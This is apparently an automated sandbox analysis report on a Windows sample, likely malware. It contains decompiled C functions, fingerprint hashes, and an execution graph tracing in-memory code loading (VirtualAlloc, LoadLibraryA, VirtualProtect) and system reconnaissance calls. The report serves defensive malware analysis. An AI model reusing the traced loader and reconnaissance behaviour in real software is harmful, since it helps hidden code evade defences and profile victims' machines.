                                                  0x000431c5
                                                  0x000431cf
                                                  0x000431d2
                                                  0x000431d7
                                                  0x000431dc
                                                  0x0004320e
                                                  0x00043213
                                                  0x0004321a
                                                  0x0004321d
                                                  0x00043222
                                                  0x00043227
                                                  0x00043259
                                                  0x0004325f
                                                  0x00043262
                                                  0x0004326d
                                                  0x0004326d
                                                  0x00043229
                                                  0x0004322b
                                                  0x00043232
                                                  0x00043238
                                                  0x0004323b
                                                  0x0004324a
                                                  0x00043246
                                                  0x00043246
                                                  0x00043246
                                                  0x0004324e
                                                  0x0004324e
                                                  0x00043278
                                                  0x00000000
                                                  0x0004327a
                                                  0x0004327e
                                                  0x00000000
                                                  0x00000000
                                                  0x0004328e
                                                  0x00043296
                                                  0x00000000
                                                  0x00043296
                                                  0x000431de
                                                  0x000431de
                                                  0x000431e2
                                                  0x000431e6
                                                  0x000431ea
                                                  0x00043207
                                                  0x000431ec
                                                  0x000431ec
                                                  0x000431f3
                                                  0x000431f3
                                                  0x000431f8
                                                  0x000431f9
                                                  0x000431fa
                                                  0x000431ff
                                                  0x0004329b
                                                  0x0004329b
                                                  0x0004329e
                                                  0x000432a2
                                                  0x000432a4
                                                  0x000432a9
                                                  0x000432bd
                                                  0x000432bf
                                                  0x000432bf
                                                  0x000432c5
                                                  0x000432c8
                                                  0x000432d3
                                                  0x000432d6
                                                  0x000432de
                                                  0x000432de
                                                  0x000432a9
                                                  0x000432e1
                                                  0x000432e5
                                                  0x00043496
                                                  0x0004349f
                                                  0x000434a4
                                                  0x000434ac
                                                  0x00000000
                                                  0x00000000
                                                  0x000434b6
                                                  0x000434cb
                                                  0x000434d2
                                                  0x00000000
                                                  0x00000000
                                                  0x000434d8
                                                  0x00000000
                                                  0x000434d8
                                                  0x000434bf
                                                  0x00000000
                                                  0x00000000
                                                  0x000434c5
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x000434c5
                                                  0x000432eb
                                                  0x000432f8
                                                  0x000432ff
                                                  0x00043300
                                                  0x00043305
                                                  0x0004330f
                                                  0x00043311
                                                  0x00043314
                                                  0x00043314
                                                  0x00043318
                                                  0x00043319
                                                  0x00043322
                                                  0x00043324
                                                  0x0004332a
                                                  0x0004333c
                                                  0x00000000
                                                  0x00000000
                                                  0x00043345
                                                  0x0004339b
                                                  0x00043406
                                                  0x0004340e
                                                  0x0004340e
                                                  0x0004340f
                                                  0x00043421
                                                  0x00043426
                                                  0x0004342e
                                                  0x00043476
                                                  0x00043476
                                                  0x00043479
                                                  0x0004347d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0004343b
                                                  0x0004343b
                                                  0x00043444
                                                  0x0004348d
                                                  0x00000000
                                                  0x00043452
                                                  0x00043456
                                                  0x00043469
                                                  0x0004346d
                                                  0x00043470
                                                  0x00043473
                                                  0x00043473
                                                  0x00000000
                                                  0x00043456
                                                  0x00043444
                                                  0x0004342e
                                                  0x000433a1
                                                  0x00000000
                                                  0x000433aa
                                                  0x000433ad
                                                  0x000433f4
                                                  0x000433f9
                                                  0x00043358
                                                  0x00043358
                                                  0x00000000
                                                  0x00043358
                                                  0x00000000
                                                  0x000433b9
                                                  0x000433c1
                                                  0x000433c6
                                                  0x000433cb
                                                  0x000433ce
                                                  0x000433db
                                                  0x000433d0
                                                  0x000433d7
                                                  0x000433d7
                                                  0x000433e7
                                                  0x000433ef
                                                  0x000433ff
                                                  0x000433ff
                                                  0x00000000
                                                  0x000433ff
                                                  0x000433ad
                                                  0x000433a1
                                                  0x0004334b
                                                  0x00000000
                                                  0x00000000
                                                  0x00043351
                                                  0x00043356
                                                  0x00043361
                                                  0x00043365
                                                  0x00043379
                                                  0x0004337d
                                                  0x00043390
                                                  0x00043390
                                                  0x00000000
                                                  0x00043365
                                                  0x00000000
                                                  0x00043484
                                                  0x00043484
                                                  0x00043484
                                                  0x00000000
                                                  0x00043484
                                                  0x0004332a
                                                  0x0004330b
                                                  0x00000000
                                                  0x0004330b
                                                  0x00043494
                                                  0x000434e2
                                                  0x000434e7
                                                  0x00043512
                                                  0x00043512
                                                  0x00043514
                                                  0x00043517
                                                  0x00043517
                                                  0x0004351b
                                                  0x0004351c
                                                  0x00043525
                                                  0x0004352d
                                                  0x00043536
                                                  0x00043541
                                                  0x00043545
                                                  0x00043545
                                                  0x00043541
                                                  0x00043548
                                                  0x0004354f
                                                  0x0004358f
                                                  0x00043593
                                                  0x0004359c
                                                  0x0004359d
                                                  0x000435a2
                                                  0x000435a2
                                                  0x000435aa
                                                  0x000435bb
                                                  0x000435bc
                                                  0x000435c2
                                                  0x000435c2
                                                  0x00000000
                                                  0x00043551
                                                  0x00043551
                                                  0x00043554
                                                  0x00043557
                                                  0x00043557
                                                  0x0004355b
                                                  0x0004355c
                                                  0x0004356a
                                                  0x0004356f
                                                  0x00043585
                                                  0x00043586
                                                  0x00043589
                                                  0x00043571
                                                  0x00043574
                                                  0x0004357b
                                                  0x0004357f
                                                  0x0004357f
                                                  0x0004358a
                                                  0x0004358a
                                                  0x00000000
                                                  0x0004356a
                                                  0x0004354f
                                                  0x000434ea
                                                  0x000434ef
                                                  0x00000000
                                                  0x00000000
                                                  0x000434f1
                                                  0x000434f5
                                                  0x000434fc
                                                  0x00000000
                                                  0x00000000
                                                  0x00043500
                                                  0x00043507
                                                  0x00043509
                                                  0x00000000
                                                  0x00000000
                                                  0x0004350b
                                                  0x0004350f
                                                  0x00000000
                                                  0x0004350f
                                                  0x00000000
                                                  0x00043494
                                                  0x000431dc

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.947175300.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                  • Associated: 00000004.00000002.947171746.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.947179183.0000000000046000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_40000_r8F8A.jbxd
                                                  Similarity
                                                  • API ID: wcschr
                                                  • String ID: ::$DATA$\\?\$\\?\UNC\
                                                  • API String ID: 1497570035-1379090233
                                                  • Opcode ID: d44fba7d4069bc1d454337cf674527ccc8018e06ebf61db4a8599c44175aa768
                                                  • Instruction ID: a8609f12e551c6e1e949f85175b2fd9e1077aac611f8776b343663bb038b8a41
                                                  • Opcode Fuzzy Hash: d44fba7d4069bc1d454337cf674527ccc8018e06ebf61db4a8599c44175aa768
                                                  • Instruction Fuzzy Hash: 2AE18DF190020AEADF61DF64C945AEEB7F4EF44314F14A07AE915AB180E7B49F80CB59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00042FD3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 112COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00042FD3(void* __ebx, wchar_t* _a4, signed int* _a8) {
				signed int* _t16;
				int _t19;
				int _t20;
				int _t22;
				signed short* _t25;
				wchar_t* _t27;
				intOrPtr* _t32;
				wchar_t* _t37;
				wchar_t* _t39;
				int _t43;
				int _t46;
				long* _t47;
				void* _t48;
				void* _t49;
				intOrPtr* _t50;
				signed short* _t51;
				signed short* _t52;

				_t51 = _a4;
				if(_t51 == 0 ||  *_t51 == 0) {
					L28:
					return 0x80070057;
				} else {
					_t16 = _a8;
					if(_t16 == 0) {
						goto L28;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(E00042D2E(_t51,  &_a4) == 0) {
						_t49 = 0x5c;
						__eflags =  *_t51 - _t49;
						if(__eflags != 0) {
							L19:
							_t19 = E00042963(__eflags, _t51);
							__eflags = _t19;
							if(_t19 == 0) {
								_t20 = E00042815(_t51, L"\\\\?\\", 4);
								__eflags = _t20;
								if(_t20 != 0) {
									_t51 =  &(_t51[4]);
									__eflags = _t51;
								}
								_t22 = iswalpha( *_t51 & 0x0000ffff);
								__eflags = _t22;
								if(_t22 == 0) {
									goto L28;
								} else {
									__eflags = _t51[1] - 0x3a;
									if(_t51[1] != 0x3a) {
										goto L28;
									}
									_t52 =  &(_t51[2]);
									__eflags = _t52;
									L26:
									__eflags =  *_t52 - _t49;
									if( *_t52 == _t49) {
										_t52 =  &(_t52[1]);
									}
									L9:
									 *_a8 = _t52;
									return 0;
								}
							}
							_t52 =  &(_t51[0x30]);
							goto L26;
						}
						_t25 =  &(_t51[1]);
						__eflags =  *_t25 - _t49;
						if(__eflags == 0) {
							goto L19;
						}
						_t52 = _t25;
						goto L9;
					}
					_t37 = _a4;
					_t50 = wcschr(_t37, 0x5c);
					if(_t50 == 0) {
						_t27 = _t37;
						_t47 =  &(_t27[0]);
						do {
							_t43 =  *_t27;
							_t27 =  &(_t27[0]);
							__eflags = _t43;
						} while (_t43 != 0);
						_t52 = _t37 + (_t27 - _t47 >> 1) * 2;
						L8:
						goto L9;
					}
					_t5 = _t50 + 2; // 0x2
					_t39 = _t5;
					_t52 = wcschr(_t39, 0x5c);
					if(_t52 == 0) {
						_t32 = _t50;
						_t7 = _t32 + 2; // 0x2
						_t48 = _t7;
						do {
							_t46 =  *_t32;
							_t32 = _t32 + 2;
							__eflags = _t46;
						} while (_t46 != 0);
						_t52 = _t50 + (_t32 - _t48 >> 1) * 2;
					} else {
						if(_t52 != _t39) {
							_t52 =  &(_t52[1]);
						}
					}
					goto L8;
				}
			}




















                                                  0x00042fd9
                                                  0x00042fdf
                                                  0x000430d5
                                                  0x00000000
                                                  0x00042fef
                                                  0x00042fef
                                                  0x00042ff4
                                                  0x00000000
                                                  0x00000000
                                                  0x00042ffa
                                                  0x00043009
                                                  0x00043077
                                                  0x00043078
                                                  0x0004307b
                                                  0x00043089
                                                  0x0004308a
                                                  0x0004308f
                                                  0x00043091
                                                  0x000430a0
                                                  0x000430a5
                                                  0x000430a7
                                                  0x000430a9
                                                  0x000430a9
                                                  0x000430a9
                                                  0x000430b0
                                                  0x000430b7
                                                  0x000430b9
                                                  0x00000000
                                                  0x000430bb
                                                  0x000430bb
                                                  0x000430c0
                                                  0x00000000
                                                  0x00000000
                                                  0x000430c2
                                                  0x000430c2
                                                  0x000430c5
                                                  0x000430c5
                                                  0x000430c8
                                                  0x000430cf
                                                  0x000430cf
                                                  0x00043039
                                                  0x0004303c
                                                  0x00000000
                                                  0x0004303e
                                                  0x000430b9
                                                  0x00043093
                                                  0x00000000
                                                  0x00043093
                                                  0x0004307d
                                                  0x00043080
                                                  0x00043083
                                                  0x00000000
                                                  0x00000000
                                                  0x00043085
                                                  0x00000000
                                                  0x00043085
                                                  0x00043012
                                                  0x0004301a
                                                  0x00043020
                                                  0x0004305d
                                                  0x0004305f
                                                  0x00043062
                                                  0x00043062
                                                  0x00043066
                                                  0x00043067
                                                  0x00043067
                                                  0x00043070
                                                  0x00043038
                                                  0x00000000
                                                  0x00043038
                                                  0x00043022
                                                  0x00043022
                                                  0x0004302a
                                                  0x00043030
                                                  0x00043045
                                                  0x00043047
                                                  0x00043047
                                                  0x0004304a
                                                  0x0004304a
                                                  0x0004304e
                                                  0x0004304f
                                                  0x0004304f
                                                  0x00043058
                                                  0x00043032
                                                  0x00043034
                                                  0x00043037
                                                  0x00043037
                                                  0x00043034
                                                  0x00000000
                                                  0x00043030

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.947175300.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                  • Associated: 00000004.00000002.947171746.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.947179183.0000000000046000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_40000_r8F8A.jbxd
                                                  Similarity
                                                  • API ID: wcschr$iswalpha
                                                  • String ID: \\?\
                                                  • API String ID: 934781262-4282027825
                                                  • Opcode ID: 601c98e1c504085365d24cd4f536153462b02c21c5272e6ab7c0d8884e132c89
                                                  • Instruction ID: 22abc68bd6c7ac1ba254ea79a7b90ea34d52cb0957215b0c3ed14043b81e4cd4
                                                  • Opcode Fuzzy Hash: 601c98e1c504085365d24cd4f536153462b02c21c5272e6ab7c0d8884e132c89
                                                  • Instruction Fuzzy Hash: 563128B6A00612A7D7359E58CC20AAB73E8EF057A0B055236ED45DB180EB70DF458BE8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 000413B9 Relevance: 6.1, APIs: 4, Instructions: 51registrywindowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E000413B9(struct HINSTANCE__* _a4, WCHAR* _a8) {
				struct _WNDCLASSW _v44;
				struct HICON__* _t17;
				WCHAR* _t22;
				signed int _t23;
				struct HINSTANCE__* _t27;

				_t23 = 9;
				_v44.style = 0;
				memset( &(_v44.lpfnWndProc), 0, _t23 << 2);
				_t27 = _a4;
				_v44.lpfnWndProc = E0004119B;
				_v44.hInstance = _t27;
				_v44.hIcon = LoadIconW(_t27, 0x64);
				_t17 = LoadCursorW(0, 0x7f00);
				_t22 = _a8;
				_v44.hCursor = _t17;
				_v44.hbrBackground = 6;
				_v44.cbWndExtra = 4;
				_v44.lpszClassName = _t22;
				RegisterClassW( &_v44);
				return CreateWindowExW(0x80, _t22, E00041460, 0, 0x80000000, 0x80000000, 0, 0, 0, 0, _t27, 0);
			}








                                                  0x000413c6
                                                  0x000413cb
                                                  0x000413d1
                                                  0x000413d3
                                                  0x000413d9
                                                  0x000413e0
                                                  0x000413ef
                                                  0x000413f2
                                                  0x000413f8
                                                  0x000413fb
                                                  0x00041402
                                                  0x00041409
                                                  0x00041410
                                                  0x00041413
                                                  0x0004143c

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.947175300.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                  • Associated: 00000004.00000002.947171746.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.947179183.0000000000046000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_40000_r8F8A.jbxd
                                                  Similarity
                                                  • API ID: Load$ClassCreateCursorIconRegisterWindow
                                                  • String ID:
                                                  • API String ID: 1446224504-0
                                                  • Opcode ID: 64e55a7f123f8c6a36339632ff1115c7e10e6b58f27e27d376b383aab0ea8445
                                                  • Instruction ID: 6f04c5dac1cc12910226d6a5b7da2546a3e18fc596e57815d6e728914db3750e
                                                  • Opcode Fuzzy Hash: 64e55a7f123f8c6a36339632ff1115c7e10e6b58f27e27d376b383aab0ea8445
                                                  • Instruction Fuzzy Hash: 88016DB6901219BBDB208F95DD49EDFBFBCEB4A750F104016F604A6140D2B45981CBF8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00041C9C Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00041C9C() {
				signed int _t10;
				void* _t15;
				intOrPtr _t18;
				intOrPtr* _t19;
				signed int _t25;
				signed int _t26;
				void* _t28;
				intOrPtr _t32;

				_t28 =  *0x40000 - 0x5a4d; // 0x5a4d
				if(_t28 != 0) {
					L8:
					_t10 = 0;
				} else {
					_t18 =  *0x4003c; // 0xd8
					_t1 = _t18 + 0x40000; // 0x4550
					_t19 = _t1;
					if( *_t19 != 0x4550) {
						goto L8;
					} else {
						_t25 =  *(_t19 + 0x18) & 0x0000ffff;
						if(_t25 != 0x10b) {
							if(_t25 != 0x20b ||  *((intOrPtr*)(_t19 + 0x84)) <= 0xe) {
								goto L8;
							} else {
								_t26 = 0;
								goto L5;
							}
						} else {
							if( *((intOrPtr*)(_t19 + 0x74)) <= 0xe) {
								goto L8;
							} else {
								_t26 = 0;
								_t32 =  *((intOrPtr*)(_t19 + 0xe8));
								L5:
								_t10 = _t26 & 0xffffff00 | _t32 != 0x00000000;
							}
						}
					}
				}
				 *0x45050 = _t10;
				__set_app_type(E00041D5E(2));
				 *0x4505c =  *0x4505c | 0xffffffff;
				 *0x45060 =  *0x45060 | 0xffffffff;
				 *(__p__fmode()) =  *0x453ac;
				 *(__p__commode()) =  *0x453a8;
				_t15 = E0004158B();
				if( *0x4539c == 0) {
					__setusermatherr(E0004158B);
				}
				E00041D46(_t15);
				return 0;
			}











                                                  0x00041ca1
                                                  0x00041ca8
                                                  0x00041d3d
                                                  0x00041d3d
                                                  0x00041cae
                                                  0x00041cae
                                                  0x00041cb3
                                                  0x00041cb3
                                                  0x00041cbf
                                                  0x00000000
                                                  0x00041cc1
                                                  0x00041cc1
                                                  0x00041ccb
                                                  0x0004250e
                                                  0x00000000
                                                  0x00042521
                                                  0x00042521
                                                  0x00000000
                                                  0x00042523
                                                  0x00041cd1
                                                  0x00041cd5
                                                  0x00000000
                                                  0x00041cd7
                                                  0x00041cd7
                                                  0x00041cd9
                                                  0x00041cdf
                                                  0x00041ce2
                                                  0x00041ce2
                                                  0x00041cd5
                                                  0x00041ccb
                                                  0x00041cbf
                                                  0x00041ce6
                                                  0x00041cf1
                                                  0x00041cf7
                                                  0x00041cfe
                                                  0x00041d13
                                                  0x00041d21
                                                  0x00041d23
                                                  0x00041d2f
                                                  0x00042533
                                                  0x00042539
                                                  0x00041d35
                                                  0x00041d3c

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.947175300.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                  • Associated: 00000004.00000002.947171746.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.947179183.0000000000046000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_40000_r8F8A.jbxd
                                                  Similarity
                                                  • API ID: __p__commode__p__fmode__set_app_type
                                                  • String ID:
                                                  • API String ID: 3338496922-0
                                                  • Opcode ID: 1c3d11c2ee71ba087ac0526d9e852ee35804e4b2e6f73fee119df6b4d5019a1e
                                                  • Instruction ID: 51557f219e31836e181284bdbdc0d43086125486ae83a9855c219c378b0c3a7f
                                                  • Opcode Fuzzy Hash: 1c3d11c2ee71ba087ac0526d9e852ee35804e4b2e6f73fee119df6b4d5019a1e
                                                  • Instruction Fuzzy Hash: B1114CF8900A05CFE7689B20ED596E837A0BB02722F50457AE563861F2DB7888C0CF1D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00042DA5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00042DA5(signed short* _a4) {
				long _t12;
				int _t13;
				signed short* _t15;
				signed short* _t17;
				signed int _t24;
				signed short* _t30;
				void* _t32;
				void* _t33;
				signed short* _t34;

				_t34 = _a4;
				if(_t34 == 0) {
					L21:
					__eflags = 0;
					return 0;
				}
				_t12 =  *_t34 & 0x0000ffff;
				if(_t12 == 0) {
					goto L21;
				}
				_t13 = iswalpha(_t12);
				_t33 = E00042E84;
				if(_t13 == 0 || E00042815( &(_t34[1]), E00042E84, 3) == 0) {
					__eflags =  *_t34 - 0x5c;
					if( *_t34 != 0x5c) {
						L7:
						_t15 = E00042D2E(_t34,  &_a4);
						__eflags = _t15;
						if(_t15 == 0) {
							__eflags = E00042815(_t34, L"\\\\?\\", 4);
							if(__eflags == 0) {
								L18:
								_t17 = E00042963(__eflags, _t34);
								__eflags = _t17;
								if(_t17 == 0) {
									goto L21;
								}
								__eflags = _t34[0x30] - 0x5c;
								if(_t34[0x30] != 0x5c) {
									goto L21;
								}
								__eflags = _t34[0x31];
								if(_t34[0x31] == 0) {
									goto L4;
								}
								goto L21;
							}
							__eflags = iswalpha(_t34[4] & 0x0000ffff);
							if(__eflags == 0) {
								goto L18;
							}
							__eflags = E00042815( &(_t34[5]), _t33, 3);
							if(__eflags != 0) {
								goto L4;
							}
							goto L18;
						}
						_t30 = _a4;
						_t32 = 0;
						while(1) {
							_t24 =  *_t30 & 0x0000ffff;
							__eflags = _t24;
							if(_t24 == 0) {
								goto L4;
							}
							__eflags = _t24 - 0x5c;
							if(_t24 != 0x5c) {
								L12:
								_t30 =  &(_t30[1]);
								__eflags = _t30;
								continue;
							}
							_t32 = _t32 + 1;
							__eflags = _t32 - 1;
							if(_t32 > 1) {
								goto L21;
							}
							__eflags = _t30[1];
							if(_t30[1] == 0) {
								goto L21;
							}
							goto L12;
						}
						goto L4;
					}
					__eflags = _t34[1];
					if(_t34[1] == 0) {
						goto L4;
					}
					goto L7;
				} else {
					L4:
					return 1;
				}
			}












                                                  0x00042dac
                                                  0x00042db2
                                                  0x00042e79
                                                  0x00042e79
                                                  0x00000000
                                                  0x00042e79
                                                  0x00042db8
                                                  0x00042dbe
                                                  0x00000000
                                                  0x00000000
                                                  0x00042dcb
                                                  0x00042dce
                                                  0x00042dd5
                                                  0x00042def
                                                  0x00042df3
                                                  0x00042dfc
                                                  0x00042e01
                                                  0x00042e06
                                                  0x00042e08
                                                  0x00042e3d
                                                  0x00042e3f
                                                  0x00042e5d
                                                  0x00042e5e
                                                  0x00042e63
                                                  0x00042e65
                                                  0x00000000
                                                  0x00000000
                                                  0x00042e67
                                                  0x00042e6c
                                                  0x00000000
                                                  0x00000000
                                                  0x00042e6e
                                                  0x00042e73
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00042e73
                                                  0x00042e49
                                                  0x00042e4b
                                                  0x00000000
                                                  0x00000000
                                                  0x00042e59
                                                  0x00042e5b
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00042e5b
                                                  0x00042e0a
                                                  0x00042e0d
                                                  0x00042e26
                                                  0x00042e26
                                                  0x00042e29
                                                  0x00042e2c
                                                  0x00000000
                                                  0x00000000
                                                  0x00042e11
                                                  0x00042e15
                                                  0x00042e24
                                                  0x00042e25
                                                  0x00042e25
                                                  0x00000000
                                                  0x00042e25
                                                  0x00042e17
                                                  0x00042e18
                                                  0x00042e1b
                                                  0x00000000
                                                  0x00000000
                                                  0x00042e1d
                                                  0x00042e22
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00042e22
                                                  0x00000000
                                                  0x00042e26
                                                  0x00042df5
                                                  0x00042dfa
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00042de7
                                                  0x00042de7
                                                  0x00000000
                                                  0x00042de9

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.947175300.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                  • Associated: 00000004.00000002.947171746.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.947179183.0000000000046000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_40000_r8F8A.jbxd
                                                  Similarity
                                                  • API ID: iswalpha
                                                  • String ID: \\?\
                                                  • API String ID: 2011389249-4282027825
                                                  • Opcode ID: 15487929008c5bb99a72ef31a52cafefcaed08058816d459474b721bcbb06038
                                                  • Instruction ID: f548e48338997ca3cb12741222b9673a2053cc88c8cd5c4e02c0f2b5c406b58d
                                                  • Opcode Fuzzy Hash: 15487929008c5bb99a72ef31a52cafefcaed08058816d459474b721bcbb06038
                                                  • Instruction Fuzzy Hash: A821D4E5B01701A5EBB46666CC81ABB72ECEF85790FD4843DFE81C6085EB64CC82C16C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00041467 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 37%
                                                  			E00041467(void* __ecx, void* _a4) {
				char _v8;
				intOrPtr _t17;
				signed int _t18;
				intOrPtr _t29;

				_t17 =  *[fs:0x18];
				_t29 =  *((intOrPtr*)(_t17 + 0x30));
				RtlImageNtHeader(_a4);
				if( *((short*)(_t17 + 0x14)) != 0 &&  *(_t17 + 0x4c) != 0) {
					 *(_t29 + 0xa4) =  *(_t17 + 0x4c) & 0x000000ff;
					 *(_t29 + 0xa8) =  *(_t17 + 0x4d) & 0x000000ff;
					 *(_t29 + 0xac) =  *(_t17 + 0x4e) & 0x00003fff;
					 *(_t29 + 0xb0) = ( *(_t17 + 0x4c) ^ 0xbfffffff) >> 0x1e;
				}
				_t18 =  &_v8;
				__imp__ImageDirectoryEntryToData( *((intOrPtr*)(_t29 + 8)), 1, 0xa, _t18);
				if(_t18 != 0) {
					_t18 =  *(_t18 + 0x34) & 0x0000ffff;
					if(_t18 != 0) {
						 *(_t29 + 0xae) = _t18;
					}
				}
				return _t18;
			}







                                                  0x0004146d
                                                  0x00041477
                                                  0x0004147a
                                                  0x00041485
                                                  0x000423b7
                                                  0x000423c1
                                                  0x000423d3
                                                  0x000423e5
                                                  0x000423e5
                                                  0x00041491
                                                  0x0004149c
                                                  0x000414a4
                                                  0x000414a6
                                                  0x000414ad
                                                  0x000423f0
                                                  0x000423f0
                                                  0x000414ad
                                                  0x000414b5

                                                  APIs
                                                  • RtlImageNtHeader.NTDLL(?), ref: 0004147A
                                                  • ImageDirectoryEntryToData.IMAGEHLP(?,00000001,0000000A,00000001,?,?,000412FF,00000001,?,?,?,00000001,?,?,00000000,?), ref: 0004149C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.947175300.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                  • Associated: 00000004.00000002.947171746.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.947179183.0000000000046000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_40000_r8F8A.jbxd
                                                  Similarity
                                                  • API ID: Image$DataDirectoryEntryHeader
                                                  • String ID: )G`v
                                                  • API String ID: 3478907836-1429216067
                                                  • Opcode ID: 9bfb99aa9b0e309ccce79efe09282ca03bf6fc8b52d91e4de0065fef7cc8310e
                                                  • Instruction ID: 96c39e6913cea9db7385fb6d85c78f4697125022228ab5aac0ece6b65465dcb0
                                                  • Opcode Fuzzy Hash: 9bfb99aa9b0e309ccce79efe09282ca03bf6fc8b52d91e4de0065fef7cc8310e
                                                  • Instruction Fuzzy Hash: 5E01F5B0624354EFC7208F21D500BE37BF4EF05710F0144A9F6968B2A1E374E980CB55
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Execution Graph

                                                  Execution Coverage:4.5%
                                                  Dynamic/Decrypted Code Coverage:81.7%
                                                  Signature Coverage:40%
                                                  Total number of Nodes:230
                                                  Total number of Limit Nodes:19
                                                  execution_graph 6530 120000 6531 120036 6530->6531 6532 120127 GetNativeSystemInfo 6531->6532 6538 1204e1 6531->6538 6533 12015f VirtualAlloc 6532->6533 6532->6538 6535 12017d 6533->6535 6534 120341 6537 1204bd VirtualProtect 6534->6537 6534->6538 6535->6534 6536 1202f1 LoadLibraryA 6535->6536 6536->6535 6537->6534 6539 7fef74d2cca 6540 7fef74d2f92 CryptCreateHash 6539->6540 6541 7fef74d2f68 6540->6541 6542 7fef74d36fa 6544 7fef74d3708 6542->6544 6543 7fef74d36ec 6544->6542 6544->6543 6545 7fef74d3834 RtlAllocateHeap 6544->6545 6545->6543 6545->6544 6806 7fef74d2cda 6807 7fef74d2ce9 CryptCreateHash 6806->6807 6808 7fef74d3134 6807->6808 6808->6808 6546 180002aa4 6549 180002174 6546->6549 6550 180002190 SleepEx 6549->6550 6550->6550 6551 1800021b4 wsprintfW 6550->6551 6552 1800021d1 6551->6552 6566 180002860 GetProcessHeap RtlAllocateHeap 6552->6566 6555 1800021e5 6581 180001d80 wsprintfW 6555->6581 6556 18000224e 6561 180002232 6602 180001b5c GetProcessHeap HeapAlloc 6561->6602 6562 18000221e GetProcessHeap HeapFree 6562->6561 6567 1800028a1 wsprintfW wsprintfW 6566->6567 6568 1800021e0 6566->6568 6661 180001484 GetTickCount64 6567->6661 6568->6555 6568->6556 6570 1800028e7 wsprintfW 6612 18000108c 6570->6612 6574 18000292f 6633 1800027b4 6574->6633 6576 18000293b 6636 180002018 GetComputerNameExW 6576->6636 6580 180002956 6580->6568 6582 180001db5 6581->6582 6584 180001e2e 6582->6584 6586 180001e1a Sleep 6582->6586 6587 180001e06 GetProcessHeap HeapFree 6582->6587 6589 180001e27 6582->6589 6693 180001b08 6582->6693 6696 180001760 6582->6696 6585 180001e33 GetProcessHeap HeapFree 6584->6585 6584->6589 6585->6589 6586->6582 6587->6586 6589->6556 6590 180001198 6589->6590 6591 1800011a9 6590->6591 6601 180001211 6590->6601 6591->6601 6725 180001688 SHGetFolderPathA 6591->6725 6594 1800011cb GetLastError 6594->6601 6595 1800011dc 6730 180001000 GetTempPathA 6595->6730 6598 1800011ed GetLastError 6598->6601 6599 1800011ff 6737 180002268 6599->6737 6601->6561 6601->6562 6603 180001bc2 6602->6603 6604 180001b92 6602->6604 6603->6556 6607 180002480 wsprintfW 6603->6607 6605 1800014b4 6 API calls 6604->6605 6606 180001ba4 wsprintfW 6605->6606 6606->6603 6608 180001b08 19 API calls 6607->6608 6609 1800024ca 6608->6609 6610 1800024f0 6609->6610 6611 1800024dc GetProcessHeap HeapFree 6609->6611 6610->6556 6611->6610 6613 1800010a3 6612->6613 6614 1800010a8 LoadLibraryA GetProcAddress 6613->6614 6615 1800010cd NtQuerySystemInformation 6613->6615 6618 1800010f5 GetProcessHeap 6613->6618 6621 